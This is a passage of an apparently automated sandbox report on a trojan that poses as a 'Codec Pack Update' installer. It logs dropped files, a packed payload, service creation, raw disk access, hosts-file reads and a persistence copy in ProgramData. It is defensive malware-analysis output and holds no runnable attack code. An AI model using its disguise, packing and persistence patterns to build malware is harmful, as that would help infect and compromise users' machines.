        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: netutils.dllJump to behavior
        Source: 0RWRPBSuDx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: codecpackupdate.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/26@1/2
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A008B8 FormatMessageA,GetLastError,3_2_00A008B8
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453D4C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00454574 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00454574
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateServiceA,CloseServiceHandle,2_2_00402572
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateServiceA,CloseServiceHandle,3_2_00402572
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409AD0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00402345 StartServiceCtrlDispatcherA,2_2_00402345
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00402345 StartServiceCtrlDispatcherA,2_2_00402345
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack UpdateJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeFile created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: 0RWRPBSuDx.exeVirustotal: Detection: 9%
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeFile read: C:\Users\user\Desktop\0RWRPBSuDx.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\0RWRPBSuDx.exe "C:\Users\user\Desktop\0RWRPBSuDx.exe"
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -iJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: 0RWRPBSuDx.exeStatic file information: File size 1954271 > 1048576

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Unpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char3_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Unpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char3_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Unpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Unpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress
        Source: codecpackupdate.exe.1.dr; Static PE information: section name: _char3_
        Source: is-K7UM1.tmp.1.dr; Static PE information: section name: /4
        Source: is-K5GCJ.tmp.1.dr; Static PE information: section name: /4
        Source: is-MU2B9.tmp.1.dr; Static PE information: section name: /4
        Source: is-IQC7T.tmp.1.dr; Static PE information: section name: /4
        Source: is-7NJT9.tmp.1.dr; Static PE information: section name: /4
        Source: is-06H7C.tmp.1.dr; Static PE information: section name: /4
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.dr; Static PE information: section name: _char3_
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00408028 push ecx; mov dword ptr [esp], eax 0_2_0040802D
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Code function: 0_2_00408E5C push 00408E8Fh; ret 0_2_00408E87
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0047E194 push 0047E272h; ret 1_2_0047E26A
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0045C1BC push ecx; mov dword ptr [esp], eax 1_2_0045C1C1
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx 1_2_00410645
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00430700 push ecx; mov dword ptr [esp], eax 1_2_00430705
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00442CD4 push ecx; mov dword ptr [esp], ecx 1_2_00442CD8
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00450C80 push 00450CB3h; ret 1_2_00450CAB
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00472D24 push ecx; mov dword ptr [esp], edx 1_2_00472D25
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx 1_2_0040CF9A
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx 1_2_0040F4FA
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004576DC push 00457720h; ret 1_2_00457718
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0047F7E8 push ecx; mov dword ptr [esp], ecx 1_2_0047F7ED
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx 1_2_00419B9D
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00455E70 push 00455EA8h; ret 1_2_00455EA0
        Source: codecpackupdate.exe.1.dr; Static PE information: section name: .text entropy: 7.659657621272276
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.dr; Static PE information: section name: .text entropy: 7.659657621272276

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 2_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_009FF7D6 CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmp
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; File created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; File created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-7NJT9.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; File created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; File created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe

        Boot Survival

        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 2_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_009FF7D6 CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 2_2_00402345 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00424104 IsIconic,SetActiveWindow
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00417508 IsIconic,GetCapture
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0047DB50 IsIconic,GetWindowLongA,ShowWindow,ShowWindow
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_00417C3E IsIconic,SetWindowPos
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Code function: 1_2_0044AEEC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 2_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Code function: 3_2_009FF8DA LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe; Window / User API: threadDelayed 9701
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_setup64.tmpJump to dropped file
